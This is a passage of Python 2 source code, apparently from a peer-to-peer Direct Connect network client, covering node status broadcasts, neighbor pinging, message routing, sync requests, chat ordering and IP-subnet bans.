del self.lookup_ipp[n.ipp]
def reorderNodesList(self):
# Recalculate and sort all nodes in the nodes list.
for n in self.nodes:
n.calcDistance(self.me)
self.nodes.sort()
def scheduleNodeExpire(self, n, when):
# Schedule a timer for the given node to expire from the network
if n.expire_dcall:
n.expire_dcall.reset(when)
return
def cb():
n.expire_dcall = None
self.nodeExited(n, "Node Timeout")
n.expire_dcall = reactor.callLater(when, cb)
def getStatus(self):
status = []
# My Session ID
status.append(self.me.sesid)
# My Uptime and Flags
status.append(struct.pack('!I', int(seconds() - self.me.uptime)))
status.append(self.me.flags())
# My Nick
status.append(struct.pack('!B', len(self.me.nick)))
status.append(self.me.nick)
# My Info
status.append(struct.pack('!B', len(self.me.info_out)))
status.append(self.me.info_out)
return status
def updateMyInfo(self, send=False):
# Grab my info from the DC client (if any) and maybe broadcast
# it into the network.
# If I'm a bridge, send bridge state instead.
if self.bsm:
if self.syncd:
self.bsm.sendState()
return
dch = self.main.getOnlineDCH()
me = self.me
old_state = (me.nick, me.info_out, me.persist)
me.persist = self.main.state.persistent
me.dttag = get_version_string()
if dch:
me.info_out = dch.formatMyInfo()
nick = dch.nick
else:
me.info_out = "<%s>" % me.dttag
nick = ''
if me.nick == nick:
# Nick hasn't changed, just update info
self.nkm.setInfoInList(me, me.info_out)
else:
# Nick has changed
# Remove old node, if I'm in there
self.nkm.removeNode(me, "Removing Myself")
# Set new info
me.nick = nick
me.setInfo(me.info_out)
# Add it back in, (no-op if my nick is empty)
try:
self.nkm.addNode(me)
except NickError:
# Nick collision. Force the DC client to go invisible.
# This will recursively call updateMyInfo with an empty nick.
lines = [
"The nick <%s> is already in use on this network." % nick,
"Please change your nick, or type !REJOIN to try again."
]
self.main.kickObserver(lines=lines, rejoin_time=None)
return
changed = (old_state != (me.nick, me.info_out, me.persist))
if (send or changed) and self.syncd:
self.sendMyStatus()
def sendMyStatus(self, sendfull=True):
# Immediately send my status, and keep sending updates over time.
# This should never be called for a bridge.
CHECK(not self.bsm)
# Skip this stuff for hidden nodes.
if self.main.hide_node:
return
self.checkStatusLimit()
def cb(sendfull):
# Choose an expiration time so that the network handles
# approximately 1 status update per second, but set bounds of
# about 1-15 minutes
expire = max(60.0, min(900.0, len(self.nodes)))
expire *= random.uniform(0.9, 1.1)
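# e.g. a 300-node network yields ~300s between my full updates,
# so the network as a whole averages about one status per second.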
self.sendStatus_dcall = reactor.callLater(expire, cb, False)
pkt_id = struct.pack('!I', self.mrm.getPacketNumber_status())
if sendfull:
packet = self.mrm.broadcastHeader('NS', self.me.ipp)
packet.append(pkt_id)
packet.append(struct.pack('!H', int(expire)))
packet.extend(self.getStatus())
else:
packet = self.mrm.broadcastHeader('NH', self.me.ipp)
packet.append(pkt_id)
packet.append(struct.pack('!H', int(expire)))
packet.append(self.me.infohash)
self.mrm.newMessage(''.join(packet), tries=8)
dcall_discard(self, 'sendStatus_dcall')
cb(sendfull)
def checkStatusLimit(self):
# Do a sanity check on the rate of status updates that I'm sending.
# If other nodes are causing me to trigger a lot, then something's
# amiss, so go to sleep for a while.
if self.statusLimit_dcall:
return
# Limit to 8 updates over 8 seconds
now = seconds()
self.statusLimit_time = max(self.statusLimit_time, now-8.0)
self.statusLimit_time += 1.0
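# statusLimit_time is a virtual clock: each update advances it 1s,
# and it may lag at most 8s behind real time. If it catches up to
# 'now', more than 8 updates were sent within 8 seconds.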
if self.statusLimit_time < now:
return
def cb():
self.statusLimit_dcall = None
self.main.showLoginStatus("*** YIKES! Too many status updates!")
self.main.shutdown(reconnect='max')
self.statusLimit_dcall = reactor.callLater(0, cb)
def isModerated(self):
if self.bcm:
return self.bcm.isModerated()
if self.bsm:
return self.bsm.isModerated()
return False
def sendLoginEcho(self):
# Send a packet to myself, in order to determine how my router
# (if any) reacts to loopback'd packets.
def cb():
self.loginEcho_dcall = None
self.loginEcho_rand = None
self.main.logPacket("No EC response")
echorand = ''.join([chr(random.randint(0,255)) for i in range(8)])
packet = ['EC']
packet.append(echorand)
ad = Ad().setRawIPPort(self.me.ipp)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
self.loginEcho_dcall = reactor.callLater(3.0, cb)
self.loginEcho_rand = echorand
def receivedLoginEcho(self, ad, rand):
if rand != self.loginEcho_rand:
raise BadPacketError("EC Rand mismatch")
myad = Ad().setRawIPPort(self.me.ipp)
dcall_discard(self, 'loginEcho_dcall')
self.loginEcho_rand = None
if ad.ip == myad.ip:
return
if ad.isPrivate():
# This matches an RFC1918 address, so it looks like a router.
# Remap this address to my external IP in the future
self.main.ph.remap_ip = (ad.ip, myad.ip)
self.main.logPacket("EC: Remap %s->%s" %
(ad.getTextIP(), myad.getTextIP()))
else:
self.main.logPacket("EC: Not RFC1918")
def makeExitPacket(self):
packet = self.mrm.broadcastHeader('NX', self.me.ipp)
packet.append(self.me.sesid)
return ''.join(packet)
def shutdown(self):
# Cancel all the dcalls here
dcall_discard(self, 'sendStatus_dcall')
dcall_discard(self, 'statusLimit_dcall')
# If I'm still syncing, shutdown the SyncManager
if self.sm:
self.sm.shutdown()
# Shut down the MessageRoutingManager (and broadcast NX)
if self.mrm:
self.mrm.shutdown()
# Shut down the BridgeServerManager
if self.bsm:
self.bsm.shutdown()
# Shut down all nodes
for n in self.nodes:
n.shutdown(self.main)
# Shut down the PingManager (and notify outbounds)
if self.pgm:
self.pgm.shutdown()
# Shut down the BanManager (just cancels some dcalls)
if self.banm:
self.banm.shutdown()
# Shut down the BridgeClientManager
if self.bcm:
self.bcm.shutdown()
# Shut down the SyncRequestRoutingManager
if self.yqrm:
self.yqrm.shutdown()
##############################################################################
class PingManager(object):
class PingNeighbor(object):
def __init__(self, ipp):
self.ipp = ipp
self.outbound = False
self.inbound = False
self.ping_reqs = {} # {ack_key: time sent}
self.sendPing_dcall = None # dcall for sending pings
self.deadNb_dcall = None # keep track of node failure
self.got_ack = False
self.u_got_ack = False
self.ping_nbs = None
self.avg_ping = None
def stillAlive(self):
# return True if the connection hasn't timed out yet
return (self.sendPing_dcall and
self.sendPing_dcall.args[0] >= 0)
def stronglyConnected(self):
# return True if both ends are willing to accept broadcast traffic
return (self.got_ack and self.u_got_ack)
OUTLINK_GOAL = 3
def __init__(self, main):
self.main = main
self.chopExcessLinks_dcall = None
self.makeNewLinks_dcall = None
# All of my ping neighbors: ipp -> PingNeighbor()
self.pnbs = {}
self.onlineTimeout_dcall = None
self.scheduleOnlineTimeout()
def receivedPing(self, src_ipp, uwant, u_got_ack, req_key, ack_key, nbs):
osm = self.main.osm
try:
pn = self.pnbs[src_ipp]
except KeyError:
# If we're not fully online yet, then reject pings that we never
# asked for.
if not osm.syncd:
raise BadTimingError("Not ready to accept pings yet")
pn = self.pnbs[src_ipp] = self.PingNeighbor(src_ipp)
CHECK(osm.syncd or pn.outbound)
# Save list of this node's neighbors
if nbs is not None:
pn.ping_nbs = tuple(nbs)
# Mark neighbor as inbound iff we got a uwant
pn.inbound = uwant
# If they requested an ACK, then we'll want to ping soon
ping_now = bool(req_key)
was_stronglyConnected = pn.stronglyConnected()
# Keep track of whether the remote node has received an ack from us
pn.u_got_ack = u_got_ack
# If this ping contains an acknowledgement...
if ack_key:
try:
sendtime = pn.ping_reqs[ack_key]
except KeyError:
raise BadPacketError("PG: unknown ack")
# Keep track of ping delay
delay = seconds() - sendtime
self.main.logPacket("Ping: %f ms" % (delay * 1000.0))
if pn.avg_ping is None:
pn.avg_ping = delay
else:
pn.avg_ping = 0.8 * pn.avg_ping + 0.2 * delay
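# Exponentially weighted moving average: 80% old estimate,
# 20% newest sample.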
# If we just got the first ack, then send a ping now to
# send the GOTACK bit to neighbor
if not pn.got_ack:
pn.got_ack = True
ping_now = True
dcall_discard(pn, 'deadNb_dcall')
# Schedule next ping in ~5 seconds
self.pingWithRetransmit(pn, tries=4, later=True)
# Got ack, so reset the online timeout
self.scheduleOnlineTimeout()
if not was_stronglyConnected and pn.stronglyConnected():
# Just got strongly connected.
if pn.outbound:
self.scheduleChopExcessLinks()
# If we have a good solid link, then the sync procedure
# can begin.
if not (osm.syncd or osm.sm):
osm.sm = SyncManager(self.main)
# Decide whether to request an ACK. This is in a nested
# function to make the logic more readable.
def i_req():
if not (pn.outbound or pn.inbound):
# Don't request an ack for an unwanted connection
return False
if not pn.stillAlive():
# Try to revitalize this connection
return True
if (ping_now and
hasattr(pn.sendPing_dcall, 'ping_is_shortable') and
dcall_timeleft(pn.sendPing_dcall) <= 1.0
):
# A REQ ping is already due within a second, so piggyback
# it on the packet we're sending now.
return True
return False
if i_req():
# Send a ping with ACK requesting + retransmits
self.pingWithRetransmit(pn, tries=4, later=False, ack_key=req_key)
elif ping_now:
# Send a ping without an ACK request
self.sendPing(pn, i_req=False, ack_key=req_key)
# If neither end wants this connection, throw it away.
if not (pn.outbound or pn.inbound):
self.cancelInactiveLink(pn)
def pingWithRetransmit(self, pn, tries, later, ack_key=None):
dcall_discard(pn, 'sendPing_dcall')
pn.ping_reqs.clear()
def cb(tries):
pn.sendPing_dcall = None
# Send the ping
self.sendPing(pn, True)
# While tries is positive, use 1 second intervals.
# When it hits zero, trigger a timeout. As it goes negative,
# pings get progressively more spaced out.
if tries > 0:
when = 1.0
else:
tries = max(tries, -7)
when = 2.0 ** -tries # max of 128 sec
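# e.g. tries=0 -> 1s, -1 -> 2s, -2 -> 4s, ... capped at -7 -> 128s.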
# Tweak the delay
when *= random.uniform(0.9, 1.1)
# Schedule retransmit
pn.sendPing_dcall = reactor.callLater(when, cb, tries-1)
# Just failed now
if tries == 0:
if self.main.osm.syncd and pn.got_ack:
# Note that we had to set sendPing_dcall before this.
self.handleNodeFailure(pn.ipp)
pn.got_ack = False
# If this was an inbound node, forget it.
pn.inbound = False
if pn.outbound:
# An outbound link just failed. Go find another one.
self.scheduleMakeNewLinks()
else:
# Neither side wants this link. Clean up.
self.cancelInactiveLink(pn)
if later:
when = 5.0
else:
# Send first ping
self.sendPing(pn, True, ack_key)
tries -= 1
when = 1.0
# Schedule retransmit(s)
when *= random.uniform(0.9, 1.1)
pn.sendPing_dcall = reactor.callLater(when, cb, tries)
# Leave a flag value in the dcall so we can test whether this
# ping can be made a bit sooner
if later:
pn.sendPing_dcall.ping_is_shortable = True
def cancelInactiveLink(self, pn):
# Quietly remove an unwanted ping neighbor.
CHECK(not pn.inbound)
CHECK(not pn.outbound)
dcall_discard(pn, 'sendPing_dcall')
dcall_discard(pn, 'deadNb_dcall')
del self.pnbs[pn.ipp]
def instaKillNeighbor(self, pn):
# Unconditionally drop neighbor connection (used for bans)
iwant = pn.outbound
pn.inbound = False
pn.outbound = False
self.cancelInactiveLink(pn)
if iwant:
self.scheduleMakeNewLinks()
def handleNodeFailure(self, ipp, nb_ipp=None):
osm = self.main.osm
CHECK(osm and osm.syncd)
# If this node isn't my neighbor, then don't even bother.
try:
pn = self.pnbs[ipp]
except KeyError:
return
# Only accept a remote failure if that node is a neighbor of pn.
if nb_ipp and pn.ping_nbs is not None and nb_ipp not in pn.ping_nbs:
return
# If this node's not online, don't bother.
try:
n = osm.lookup_ipp[ipp]
except KeyError:
return
# A bridge node will just have to time out on its own
if n.bridge_data:
return
# If the node's about to expire anyway, don't bother
if dcall_timeleft(n.expire_dcall) <= NODE_EXPIRE_EXTEND * 1.1:
return
failedMe = not pn.stillAlive()
# Trigger an NF message if I've experienced a failure, and:
# - someone else just experienced a failure, or
# - someone else experienced a failure recently, or
# - I seem to be pn's only neighbor.
pkt_id = struct.pack('!I', n.status_pktnum)
if failedMe and (nb_ipp or pn.deadNb_dcall or pn.ping_nbs==()):
dcall_discard(pn, 'deadNb_dcall')
packet = osm.mrm.broadcastHeader('NF', n.ipp)
packet.append(pkt_id)
packet.append(n.sesid)
try:
osm.mrm.newMessage(''.join(packet), tries=2)
except MessageCollisionError:
# It's possible, but rare, that we've seen this NF before
# without fully processing it.
pass
osm.scheduleNodeExpire(n, NODE_EXPIRE_EXTEND)
elif nb_ipp:
# If this failure was reported by someone else, then set the
# deadNb_dcall, so when I detect a failure, I'll be sure of it.
def cb():
pn.deadNb_dcall = None
dcall_discard(pn, 'deadNb_dcall')
pn.deadNb_dcall = reactor.callLater(15.0, cb)
elif pn.ping_nbs:
# Reported by me, and pn has neighbors, so
# Send Possible Failure message to pn's neighbors
packet = ['PF']
packet.append(osm.me.ipp)
packet.append(n.ipp)
packet.append(pkt_id)
packet.append(n.sesid)
packet = ''.join(packet)
for nb_ipp in pn.ping_nbs:
ad = Ad().setRawIPPort(nb_ipp)
self.main.ph.sendPacket(packet, ad.getAddrTuple())
def scheduleMakeNewLinks(self):
# Call this whenever a new sync'd node is added
# Or when a connected link dies
# This never needs to run more than once per reactor loop
if self.makeNewLinks_dcall:
return
def cb():
self.makeNewLinks_dcall = None
osm = self.main.osm
# Make sure the K closest nonbroken nodes are marked as outbound
n_alive = 0
for n in osm.nodes:
try:
pn = self.pnbs[n.ipp]
except KeyError:
pn = self.pnbs[n.ipp] = self.PingNeighbor(n.ipp)
if not pn.outbound:
if not pn.inbound:
# Completely new link
tries = 2
elif pn.stronglyConnected():
# An active inbound link is being marked as outbound,
# so we might want to close some other outbound
# link. Note that this won't run until the next
# reactor loop.
self.scheduleChopExcessLinks()
tries = 4
else:
# Existing link, not strongly connected yet
tries = 2
pn.outbound = True
self.pingWithRetransmit(pn, tries=tries, later=False)
if pn.outbound and pn.stillAlive():
n_alive += 1
if n_alive >= self.OUTLINK_GOAL:
break
self.makeNewLinks_dcall = reactor.callLater(0, cb)
def scheduleChopExcessLinks(self):
# Call this whenever a link goes from a connecting state to an
# active state.
# This never needs to run more than once per reactor loop
if self.chopExcessLinks_dcall:
return
def cb():
self.chopExcessLinks_dcall = None
osm = self.main.osm
# Keep a set of unwanted outbound neighbors. We will remove
# wanted neighbors from this set, and kill what remains.
unwanted = set(pn.ipp for pn in self.pnbs.itervalues()
if pn.outbound)
n_alive = 0
for n in osm.nodes:
try:
pn = self.pnbs[n.ipp]
if not pn.outbound:
raise KeyError
except KeyError:
# We ran out of nodes before hitting the target number
# of strongly connected nodes. That means stuff's still
# connecting, and there's no need to remove anyone.
unwanted.clear()
break
# This neighbor is NOT unwanted.
unwanted.remove(pn.ipp)
# Stop once we reach the desired number of outbound links.
if pn.stronglyConnected():
n_alive += 1
if n_alive == self.OUTLINK_GOAL:
break
# If any unwanted links remain, remove them.
for ipp in unwanted:
CHECK(self.removeOutboundLink(ipp))
self.chopExcessLinks_dcall = reactor.callLater(0, cb)
def scheduleOnlineTimeout(self):
# This will automatically shut down the node if we don't get any
# ping acknowledgements for a while
if self.onlineTimeout_dcall:
self.onlineTimeout_dcall.reset(ONLINE_TIMEOUT)
return
def cb():
self.onlineTimeout_dcall = None
self.main.showLoginStatus("Lost Sync!")
self.main.shutdown(reconnect='normal')
self.onlineTimeout_dcall = reactor.callLater(ONLINE_TIMEOUT, cb)
def removeOutboundLink(self, ipp):
try:
pn = self.pnbs[ipp]
except KeyError:
return False
if not pn.outbound:
return False
# Send iwant=0 to neighbor
pn.outbound = False
if pn.inbound:
self.pingWithRetransmit(pn, tries=4, later=False)
else:
self.sendPing(pn, i_req=False, ack_key=None)
self.cancelInactiveLink(pn)
return True
def sendPing(self, pn, i_req, ack_key=None):
# Transmit a single ping to the given node
osm = self.main.osm
# Expire old ack requests
if pn.ping_reqs:
now = seconds()
for req_key, when in pn.ping_reqs.items():
if now - when > 15.0:
del pn.ping_reqs[req_key]
iwant = pn.outbound
# For now, include neighbor list only when requesting an ack.
nblist = i_req
# Offline bit is set if this neighbor is not recognized.
# (this just gets ignored, but it could be useful someday)
offline = osm.syncd and (pn.ipp not in osm.lookup_ipp)
# Build packet
packet = ['PG']
packet.append(osm.me.ipp)
flags = ((iwant and IWANT_BIT) |
(pn.got_ack and GOTACK_BIT) |
(i_req and REQ_BIT) |
(bool(ack_key) and ACK_BIT) |
(nblist and NBLIST_BIT) |
(offline and OFFLINE_BIT)
)
packet.append(struct.pack('!B', flags))
if i_req:
# I'm requesting that this packet be acknowledged, so generate
# a new req_key
while True:
req_key = randbytes(4)
if req_key not in pn.ping_reqs:
break
pn.ping_reqs[req_key] = seconds()
packet.append(req_key)
if ack_key:
packet.append(ack_key)
if nblist:
if osm.syncd:
# Grab my list of ping neighbors.
nbs = [pn_it.ipp for pn_it in self.pnbs.itervalues()
if (pn_it.ipp != pn.ipp and
pn_it.ipp in osm.lookup_ipp and
pn_it.stronglyConnected())]
# Don't bother sending more than 8
nbs.sort()
del nbs[8:]
else:
nbs = []
packet.append(struct.pack("!B", len(nbs)))
packet.extend(nbs)
ad = Ad().setRawIPPort(pn.ipp)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
def shutdown(self):
dcall_discard(self, 'chopExcessLinks_dcall')
dcall_discard(self, 'makeNewLinks_dcall')
dcall_discard(self, 'onlineTimeout_dcall')
outbounds = [pn for pn in self.pnbs.itervalues() if pn.outbound]
for pn in self.pnbs.values(): # can't use itervalues
pn.inbound = False
pn.outbound = False
self.cancelInactiveLink(pn)
for pn in outbounds:
self.sendPing(pn, i_req=False, ack_key=None)
##############################################################################
class MessageRoutingManager(object):
class Message(object):
# This is set for my own status messages only.
status_pktnum = None
def __init__(self, data, tries, sendto, ph):
# Message expiration timer.
self.expire_dcall = None
# If no tries remain, don't try to send anything.
if not tries > 0:
return
# {neighbor ipp -> retry dcall}
self.sending = {}
create_time = seconds()
for nb_ipp in sendto:
self.scheduleSend(data, tries, nb_ipp, create_time, ph)
self.cleanupIfDoneSending()
def scheduleSend(self, data, tries, nb_ipp, create_time, ph):
# Get ready to pass this message to a neighbor.
# If we're passing an NF to the node who's dying, then up the
# number of retries to 8, because it's rather important.
if data[0:2] == 'NF' and data[10:16] == nb_ipp:
tries = 8
def cb(tries):
# Ack timeout/retransmit callback
send_data = data
# Decrease the hop count by the number of seconds the packet
# has been buffered.
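# data[8] holds the hop-limit byte (see generateKey's layout map).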
buffered_time = int(seconds() - create_time)
if buffered_time > 0:
hops = ord(data[8]) - buffered_time
if hops >= 0:
# Splice in the reduced hop count.
send_data = "%s%c%s" % (data[:8], hops, data[9:])
else:
# Drop packet.
tries = 0
# Make an attempt now
if tries > 0:
addr = Ad().setRawIPPort(nb_ipp).getAddrTuple()
ph.sendPacket(send_data, addr, broadcast=True)
# Reschedule another attempt
if tries-1 > 0:
when = random.uniform(1.0, 2.0)
self.sending[nb_ipp] = reactor.callLater(when, cb, tries-1)
else:
del self.sending[nb_ipp]
self.cleanupIfDoneSending()
# Send on the next reactor loop. This gives us a bit of time
# to listen for dupes from neighbors.
self.sending[nb_ipp] = reactor.callLater(0, cb, tries)
def cancelSendToNeighbor(self, nb_ipp):
# This neighbor already has the message, so don't send it.
try:
self.sending.pop(nb_ipp).cancel()
except (AttributeError, KeyError):
return
self.cleanupIfDoneSending()
def cleanupIfDoneSending(self):
# If no sends are left, free up some RAM.
if not self.sending:
del self.sending
def scheduleExpire(self, msgs, ack_key):
# Forget about this message, eventually.
if self.expire_dcall:
self.expire_dcall.reset(180.0)
return
def cb():
self.expire_dcall = None
self.cancelAllSends()
del msgs[ack_key]
self.expire_dcall = reactor.callLater(180.0, cb)
def cancelAllSends(self):
# Cancel any pending sends.
try:
self.sending
except AttributeError:
return
for d in self.sending.itervalues():
d.cancel()
del self.sending
def __init__(self, main):
self.main = main
self.msgs = {}
self.rcollide_last_NS = None
self.rcollide_ipps = set()
r = random.randint(0, 0xFFFFFFFF)
self.search_pktnum = r
self.chat_pktnum = r
self.main.osm.me.status_pktnum = r
def generateKey(self, data):
# 0:2 = kind
# 2:8 = neighbor ipp
# 8:9 = hop limit
# 9:10 = flags
# 10:16 = source ipp
# 16: = "the rest"
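# Bytes 2:10 (neighbor ipp, hop limit, flags) change as the packet
# is forwarded, so they're excluded to keep the key stable.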
return md5(data[0:2] + data[10:]).digest()[:8]
def pokeMessage(self, ack_key, nb_ipp):
# If we know about this message, then mark down that this neighbor
# has acknowledged it.
try:
m = self.msgs[ack_key]
except KeyError:
# Don't know about this message
return False
# Extend the expiration time.
m.scheduleExpire(self.msgs, ack_key)
# If not locally-generated, tell the message that this neighbor
# acknowledged it.
if nb_ipp:
m.cancelSendToNeighbor(nb_ipp)
# Message is known.
return True
def newMessage(self, data, tries, nb_ipp=None):
# Forward a new message to my neighbors
kind = data[0:2]
ack_key = self.generateKey(data)
if ack_key in self.msgs:
raise MessageCollisionError("Duplicate " + kind)
ph = self.main.ph
osm = self.main.osm
# Get my current neighbors who we know to be alive. We don't
# need to verify pn.u_got_ack because it doesn't really matter.
sendto = (pn.ipp for pn in osm.pgm.pnbs.itervalues() if pn.got_ack)
# Start sending.
m = self.msgs[ack_key] = self.Message(data, tries, sendto, ph)
CHECK(self.pokeMessage(ack_key, nb_ipp))
if data[10:16] == osm.me.ipp:
CHECK(not self.main.hide_node)
if kind in ('NH','CH','SQ','TP'):
# Save the current status_pktnum for this message, because
# it's useful if we receive a Reject message later.
m.status_pktnum = osm.me.status_pktnum
elif kind == 'NS':
# Save my last NS message, so that if it gets rejected,
# it can be interpreted as a remote nick collision.
self.rcollide_last_NS = m
self.rcollide_ipps.clear()
def receivedRejection(self, ack_key, ipp):
# Broadcast rejection, sent in response to a previous broadcast if
# another node doesn't recognize us on the network.
# We attach a status_pktnum to any broadcast which could possibly
# be rejected. If this matches my status_pktnum now, then we should
# broadcast a new status, which will change status_pktnum and
# prevent this same broadcast from triggering another status update.
osm = self.main.osm
try:
m = self.msgs[ack_key]
except KeyError:
raise BadTimingError("Reject refers to an unknown broadcast")
if m is self.rcollide_last_NS:
# Remote nick collision might have occurred
self.rcollide_ipps.add(ipp)
if len(self.rcollide_ipps) > 1:
# Multiple nodes have reported a problem, so tell the user.
dch = self.main.getOnlineDCH()
if dch:
dch.remoteNickCollision()
# No more reports until next time
self.rcollide_last_NS = None
self.rcollide_ipps.clear()
if osm.me.status_pktnum == m.status_pktnum:
# One of my hash-containing broadcasts has been rejected, so
# send my full status to refresh everyone.
# (Note: m.status_pktnum is None for irrelevant messages.)
osm.sendMyStatus()
def getPacketNumber_search(self):
self.search_pktnum = (self.search_pktnum + 1) % 0x100000000
return self.search_pktnum
def getPacketNumber_chat(self):
self.chat_pktnum = (self.chat_pktnum + 1) % 0x100000000
return self.chat_pktnum
def getPacketNumber_status(self):
me = self.main.osm.me
me.status_pktnum = (me.status_pktnum + 1) % 0x100000000
return me.status_pktnum
def broadcastHeader(self, kind, src_ipp, hops=32, flags=0):
# Build the header used for all broadcast packets
packet = [kind]
packet.append(self.main.osm.me.ipp)
packet.append(struct.pack('!BB', hops, flags))
packet.append(src_ipp)
return packet
def shutdown(self):
# Cancel everything
for m in self.msgs.values():
dcall_discard(m, 'expire_dcall')
m.cancelAllSends()
self.msgs.clear()
# Immediately broadcast NX to my neighbors
ph = self.main.ph
osm = self.main.osm
if osm and osm.syncd and not self.main.hide_node:
packet = osm.makeExitPacket()
for pn in osm.pgm.pnbs.itervalues():
ad = Ad().setRawIPPort(pn.ipp)
ph.sendPacket(packet, ad.getAddrTuple(), broadcast=True)
##############################################################################
class SyncRequestRoutingManager(object):
class Message(object):
def __init__(self):
self.nbs = {} # {ipp: max hop count}
self.expire_dcall = None
def scheduleExpire(self, msgs, key):
if self.expire_dcall:
self.expire_dcall.reset(180.0)
return
def cb():
del msgs[key]
self.expire_dcall = reactor.callLater(180.0, cb)
def __init__(self, main):
self.main = main
self.msgs = {}
def receivedSyncRequest(self, nb_ipp, src_ipp, sesid, hop, timedout):
osm = self.main.osm
ph = self.main.ph
key = (src_ipp, sesid)
# Get ipp of all syncd neighbors who we've heard from recently
CHECK(osm and osm.syncd)
my_nbs = [pn.ipp for pn in osm.pgm.pnbs.itervalues()
if pn.got_ack and pn.ipp in osm.lookup_ipp]
# Put neighbors in random order
random.shuffle(my_nbs)
# See if we've seen this sync message before
try:
m = self.msgs[key]
isnew = False
except KeyError:
m = self.msgs[key] = self.Message()
isnew = True
# Expire the message in a while
m.scheduleExpire(self.msgs, key)
# Set the hop value of the neighbor who sent us this packet
try:
if m.nbs[nb_ipp] < hop+1:
raise KeyError
except KeyError:
m.nbs[nb_ipp] = hop+1
if hop > 0:
# Build packet to forward
packet = osm.mrm.broadcastHeader('YQ', src_ipp, hop-1)
packet.append(sesid)
packet = ''.join(packet)
# Contacted/Uncontacted lists
cont = []
uncont = []
for ipp in my_nbs:
# If we've already contacted enough nodes, or we know this
# node has already been contacted with a higher hop count,
# then don't forward the sync request to it.
try:
if len(cont) >= 3 or m.nbs[ipp] >= hop-1:
uncont.append(ipp)
continue
except KeyError:
pass
cont.append(ipp)
m.nbs[ipp] = hop-1
ad = Ad().setRawIPPort(ipp)
ph.sendPacket(packet, ad.getAddrTuple(), broadcast=True)
else:
# no hops left
cont = []
uncont = my_nbs
# Cut off after 16 nodes, just in case
uncont = uncont[:16]
if isnew or timedout:
self.sendSyncReply(src_ipp, cont, uncont)
def sendSyncReply(self, src_ipp, cont, uncont):
ad = Ad().setRawIPPort(src_ipp)
osm = self.main.osm
CHECK(osm and osm.syncd)
# Build Packet
packet = ['YR']
# My IP:Port
packet.append(osm.me.ipp)
# My last pktnum
packet.append(struct.pack('!I', osm.me.status_pktnum))
# If we send a YR which is almost expired, followed closely by
# an NH with an extended expire time, then a race condition exists,
# because the target could discard the NH before receiving the YR.
# So, if we're about to expire, go send a status update NOW so that
# we'll have a big expire time to give to the target.
expire = dcall_timeleft(osm.sendStatus_dcall)
if expire <= 5.0:
osm.sendMyStatus(sendfull=False)
expire = dcall_timeleft(osm.sendStatus_dcall)
# Exact time left before my status expires.
# (The receiver will add a few buffer seconds.)
packet.append(struct.pack('!H', int(expire)))
# Session ID, Uptime, Flags, Nick, Info
packet.extend(osm.getStatus())
# If I think I set the topic last, then put it in here.
# It's up to the receiving end whether they'll believe me.
if osm.tm.topic_node is osm.me:
topic = osm.tm.topic
else:
topic = ""
packet.append(struct.pack('!B', len(topic)))
packet.append(topic)
# Contacted Nodes
packet.append(struct.pack('!B', len(cont)))
packet.extend(cont)
# Uncontacted Nodes
packet.append(struct.pack('!B', len(uncont)))
packet.extend(uncont)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
def shutdown(self):
# Cancel all timeouts
for m in self.msgs.values():
dcall_discard(m, 'expire_dcall')
##############################################################################
class ChatMessageSequencer(object):
# If chat messages arrive out-of-order, this will delay
# some messages for a couple seconds waiting for packets to arrive.
def __init__(self, main):
self.main = main
def addMessage(self, n, pktnum, nick, text, flags):
if not self.main.getStateObserver():
return
# False == the bridge wants us to queue everything
unlocked = not hasattr(n, 'dns_pending')
msg = (nick, text, flags)
if n.chatq_base is None:
n.chatq_base = pktnum
# How far forward/back to accept messages
FUZZ = 10
# Find the pktnum index relative to the current base.
# If it's slightly older, this will be negative.
idx = ((pktnum - n.chatq_base + FUZZ) % 0x100000000) - FUZZ
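# Example with wraparound: base=0xFFFFFFFF, pktnum=2
# -> idx = ((2 - 0xFFFFFFFF + 10) % 0x100000000) - 10 = 3.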
if idx < 0:
# Older message, send out of order
if unlocked:
self.sendMessage(n, msg)
elif idx >= FUZZ:
# Way out there; put this at the end and dump everything
if unlocked:
n.chatq.append(msg)
self.flushQueue(n)
else:
# From the near future: (0 <= idx < FUZZ)
# Make sure the queue is big enough;
# put a timestamp in the empty spaces.
extra = (idx - len(n.chatq)) + 1
if extra > 0:
n.chatq.extend([seconds()] * extra)
# Insert the current message into its space
if (type(n.chatq[idx]) is float):
n.chatq[idx] = msg
# Possible spoof?
# Don't know which one's real, so flush the queue and move on.
elif n.chatq[idx] != msg:
if unlocked:
n.chatq.insert(idx + 1, msg)
self.flushQueue(n)
return
if unlocked:
self.advanceQueue(n)
def advanceQueue(self, n):
# Send first block of available messages
while n.chatq and (type(n.chatq[0]) is not float):
msg = n.chatq.pop(0)
n.chatq_base = (n.chatq_base + 1) % 0x100000000
self.sendMessage(n, msg)
dcall_discard(n, 'chatq_dcall')
# If any messages remain, send them later.
if not n.chatq:
return
def cb():
n.chatq_dcall = None
# Forget any missing messages at the beginning
while n.chatq and (type(n.chatq[0]) is float):
n.chatq.pop(0)
n.chatq_base = (n.chatq_base + 1) % 0x100000000
# Send the first block of available messages
self.advanceQueue(n)
# The first queue entry contains a timestamp.
# Let the gap survive for 2 seconds total.
when = max(0, n.chatq[0] + 2.0 - seconds())
n.chatq_dcall = reactor.callLater(when, cb)
def flushQueue(self, n):
# Send all the messages in the queue, in order
for msg in n.chatq:
if (type(msg) is not float):
self.sendMessage(n, msg)
self.clearQueue(n)
def clearQueue(self, n):
# Reset everything to normal
del n.chatq[:]
dcall_discard(n, 'chatq_dcall')
n.chatq_base = None
def sendMessage(self, n, msg):
so = self.main.getStateObserver()
if so:
nick, text, flags = msg
so.event_ChatMessage(n, nick, text, flags)
##############################################################################
class BanManager(object):
def __init__(self, main):
self.main = main
self.rebuild_bans_dcall = None
self.ban_matcher = SubnetMatcher()
self.isBanned = self.ban_matcher.containsIP
def scheduleRebuildBans(self):
if self.rebuild_bans_dcall:
return
def cb():
self.rebuild_bans_dcall = None
osm = self.main.osm
self.ban_matcher.clear()
# Get all bans from bridges.
if osm.bcm:
for bridge in osm.bcm.bridges:
for b in bridge.bans.itervalues():
if b.enable:
self.ban_matcher.addRange(b.ipmask)
# If I'm a bridge, get bans from IRC.
if osm.bsm and self.main.ism:
for ipmask in self.main.ism.bans:
self.ban_matcher.addRange(ipmask)
self.enforceAllBans()
# This time is slightly above zero, so that broadcast deliveries
# will have a chance to take place before carnage occurs.
self.rebuild_bans_dcall = reactor.callLater(1.0, cb)
def enforceAllBans(self):
osm = self.main.osm
# Check all the online nodes.
for n in list(osm.nodes):
int_ip = Ad().setRawIPPort(n.ipp).getIntIP()
